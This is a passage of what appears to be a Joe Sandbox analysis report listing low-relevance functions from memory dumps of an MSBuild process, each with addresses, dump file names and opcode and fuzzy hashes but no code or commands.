                        • Opcode ID: 6410851bf0cf7060e5e5eb9866a7c2c995ad0370b9e5dc0f58397011966eca8b
                        • Instruction ID: 5c7355066d328e574e12695875b003d5d3b01996ba0f18f1a833a69b1f888adc
                        • Opcode Fuzzy Hash: 6410851bf0cf7060e5e5eb9866a7c2c995ad0370b9e5dc0f58397011966eca8b
                        • Instruction Fuzzy Hash: A7D05E31612114AB8B88DA18980488AB7A8EB982123208098B6049B201C632E843CB90
                        Function 066FF7C0 Relevance: .0, Instructions: 17COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 13492bf765c33d9a9d0e089bf0cb7385880103a848a1c332c78db5635fc2261f
                        • Instruction ID: b39f792e2fd4c43d85c780d26655512f5b546f3859c069f89302f6d0025e96cb
                        • Opcode Fuzzy Hash: 13492bf765c33d9a9d0e089bf0cb7385880103a848a1c332c78db5635fc2261f
                        • Instruction Fuzzy Hash: 0CD05E702142088BCB04AFB5F4899297BAAEB8031AB8441A5F40D87755DF35E891AA55
                        Function 01011868 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9def8540726db0dcd0bd6638a6489dac56168d5dd3bde2da93e207d3236d6363
                        • Instruction ID: 691d2306bccc796028287588759cd7fa8532a045f8b4aa2adaeafb8c2df1888a
                        • Opcode Fuzzy Hash: 9def8540726db0dcd0bd6638a6489dac56168d5dd3bde2da93e207d3236d6363
                        • Instruction Fuzzy Hash: 8AD01771A0120CEFCB80EFA8ED4155DBBB9EF44264B5045A9E408E3311EF356F01AB90
                        Function 01011F2C Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c7674ed210532ca1c92003e94448c42056be4c9add54c88f3ca7ad998e195edf
                        • Instruction ID: 196220cefd9a48e54cdab31ee612d6cbf6a98b07bdc470f8db75e70943240db5
                        • Opcode Fuzzy Hash: c7674ed210532ca1c92003e94448c42056be4c9add54c88f3ca7ad998e195edf
                        • Instruction Fuzzy Hash: A2E01230641209DBEB29EF75E5597AD7F72FF21749F60042DE241AA194DB788944CF40
                        Function 0101FEA0 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c41f947b7f636f7b05de88b02705c7c4af8cc2d0f68e93557c8f6b4c8f68659c
                        • Instruction ID: c61509c0c0ab4d170ece41f5765904818f7c5680ac4cef55d0ee2826f9f1803c
                        • Opcode Fuzzy Hash: c41f947b7f636f7b05de88b02705c7c4af8cc2d0f68e93557c8f6b4c8f68659c
                        • Instruction Fuzzy Hash: 52D012726442582B4715EEADA8605DFBFADDA84170F00446AD909D7245ED715A4042D9
                        Function 067353B6 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62e9af23d3e3bf0b4659f0c087d5a95e57588913bb98810bba3a26b145177c80
                        • Instruction ID: 79ff8b83639eb6d5fc9b13f77eedebd9ea6baaafa9b9a3298a0414f16577632a
                        • Opcode Fuzzy Hash: 62e9af23d3e3bf0b4659f0c087d5a95e57588913bb98810bba3a26b145177c80
                        • Instruction Fuzzy Hash: C1D0A731911728AFE7705564E5047B67BE9AF44634F001419E44542901DEE078804B91
                        Function 0673AD98 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 20ff9a734565ef8a03a3db600165d0be8e613095e600732c136c6ee762031bde
                        • Instruction ID: 820532cab9c913c466c0c81bb83060aec5f7b92d79e2315477d326e15c11e49f
                        • Opcode Fuzzy Hash: 20ff9a734565ef8a03a3db600165d0be8e613095e600732c136c6ee762031bde
                        • Instruction Fuzzy Hash: 41D02230B6A3292783D0B76EB8004A7BBDE4F86012380026AEA08C3346ED10EC8443D9
                        Function 066FD288 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3b10fc650f7c21a86ca0f830195ded02b11df8d3f60e5b27f3a527ecb3e47a5c
                        • Instruction ID: 492c55376d7d0dd003c33d0a38c5ea0406d7afc107987ec2b758766b3acf4801
                        • Opcode Fuzzy Hash: 3b10fc650f7c21a86ca0f830195ded02b11df8d3f60e5b27f3a527ecb3e47a5c
                        • Instruction Fuzzy Hash: 17D062B0D0521D9F4B84EFA9944156EBFF4BB48314F10456AD918E3344E6346A518BD1
                        Function 0673AEF0 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7251e4baff07d0d27f06706abb0718f8dfbe065f6265562e07f76baf6512090
                        • Instruction ID: 2fa4818b88c51df884ff820911148f7bed7d78e4255ecd36276ff68a69a4f4d9
                        • Opcode Fuzzy Hash: e7251e4baff07d0d27f06706abb0718f8dfbe065f6265562e07f76baf6512090
                        • Instruction Fuzzy Hash: ADD09E36101218FBCB065B95D800895BF6AEF1D35971480A9F6099A221C773D472DBD4
                        Function 0101CF77 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ac18b3b3c6357743cfb5bc0e428bec4876fb4860968186150eb8ed516f9c1f6
                        • Instruction ID: 9c7c7054bf94ed575c56caf74a7f23cf584791f2e9cf9181de99e76a215bca61
                        • Opcode Fuzzy Hash: 6ac18b3b3c6357743cfb5bc0e428bec4876fb4860968186150eb8ed516f9c1f6
                        • Instruction Fuzzy Hash: 27D0222E04920B0AE7219A14A80A370BF29E382202F008287FC08C10428F3984028250
                        Function 067353B8 Relevance: .0, Instructions: 14COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53512c932dbb2d02f76e94eee7cb50238f0c5fc206970cc740e3fe6c7d91e11e
                        • Instruction ID: 34b6b81a89edd80ea78b474865d04d5a24e50087a491c74e501ad25023631140
                        • Opcode Fuzzy Hash: 53512c932dbb2d02f76e94eee7cb50238f0c5fc206970cc740e3fe6c7d91e11e
                        • Instruction Fuzzy Hash: BCD02331D117389FD7705564D1043B577E9AF04534F00101DD44542901DFF074404B80
                        Function 06735741 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1b1e85094d2aabd8a513ddd3b78f3ea2eb359e81467c66641900e6bea4ffa44f
                        • Instruction ID: 9dced82c33a9d191df901ab8c33ebdea5385a22543db645a1441600240b3114e
                        • Opcode Fuzzy Hash: 1b1e85094d2aabd8a513ddd3b78f3ea2eb359e81467c66641900e6bea4ffa44f
                        • Instruction Fuzzy Hash: 7FC08C3900A3A09FC7069B30481059B7F326A4330232B80EAE450AB392C52A6C47EBB1
                        Function 067363D1 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ac3244a499c8f145163dee9b299e11309456811943762b160669fa5de9464bc
                        • Instruction ID: 60896db38664366a721fcfb8ad539ff651b0c069fd8b05a9cbb49670e8accbcb
                        • Opcode Fuzzy Hash: 9ac3244a499c8f145163dee9b299e11309456811943762b160669fa5de9464bc
                        • Instruction Fuzzy Hash: B3D0A931508345DED305BBB4880001CB731BFE3308F4085AED089AA2A1EA32C959E762
                        Function 066F9508 Relevance: .0, Instructions: 12COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a274bacd1a6046c19430ff6c6c7b288347e866fd219dc18ecf072d0b49b174be
                        • Instruction ID: 8a72140058842ae6cadf7cdc9ec47c5daf7fcd6624219610aa40d04c1e47d1c7
                        • Opcode Fuzzy Hash: a274bacd1a6046c19430ff6c6c7b288347e866fd219dc18ecf072d0b49b174be
                        • Instruction Fuzzy Hash: BFC08C71D0030CAF8B40EEE58A018AEB7AEDB82100B0047AAD80A87214FE329F0046E6
                        Function 066F8760 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f87f98aabb14818f58b92318417aa6a2019d42de9ec938b81a6f505b3cffd8a
                        • Instruction ID: 2912441a1aae5fb0c81aee88886c109342339a11f949911349127dc8dbf36281
                        • Opcode Fuzzy Hash: 1f87f98aabb14818f58b92318417aa6a2019d42de9ec938b81a6f505b3cffd8a
                        • Instruction Fuzzy Hash: C0C0123145060D8EC700BB68D4044587B78FB15300B044119D54556110FF30A155DB91
                        Function 066F8730 Relevance: .0, Instructions: 10COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1685976702.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_66f0000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 110ab5572180df38f6195a1f0f0fb7399031f295a51f9a74dad0febdfb5e1392
                        • Instruction ID: 7804ecf6023fe4c69974369f99d1443040b68708fe2284a981b7aae47ba4208e
                        • Opcode Fuzzy Hash: 110ab5572180df38f6195a1f0f0fb7399031f295a51f9a74dad0febdfb5e1392
                        • Instruction Fuzzy Hash: 12C0123141060C8EC700BB68D40485CBB78EB15201B405119D54516111EF30A599DB91
                        Function 067346F8 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1686208066.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6730000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ffefbbf9dc84b6e544fb03c9e2ffb8c4a72643a52febea52a0a138f67832638c
                        • Instruction ID: 32230dda2f70fde27def962b0ebbf55aa6ec9dbf6784b5ab3ed0edc57ad1b7e4
                        • Opcode Fuzzy Hash: ffefbbf9dc84b6e544fb03c9e2ffb8c4a72643a52febea52a0a138f67832638c
                        • Instruction Fuzzy Hash: F1C08C20B2C26807CF00AEA9A0152313BB1A783A08B0080E4F092AB54ACA286501EAA1
                        Function 0101FE71 Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000002.00000002.1680309189.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_1010000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f98f1572968dd225e70230bb5f2d96a34154b14c371a4931328bb73cf9c9a6eb
                        • Instruction ID: f72015a4e1981862bc2b8bbdf8c33ea8a29a1372d6d9874db622e76443e1a658
                        • Opcode Fuzzy Hash: f98f1572968dd225e70230bb5f2d96a34154b14c371a4931328bb73cf9c9a6eb
                        • Instruction Fuzzy Hash: 85B092F19253444FFF026371AE293896E609B52346B0282A1AC81951A59E28540A9A72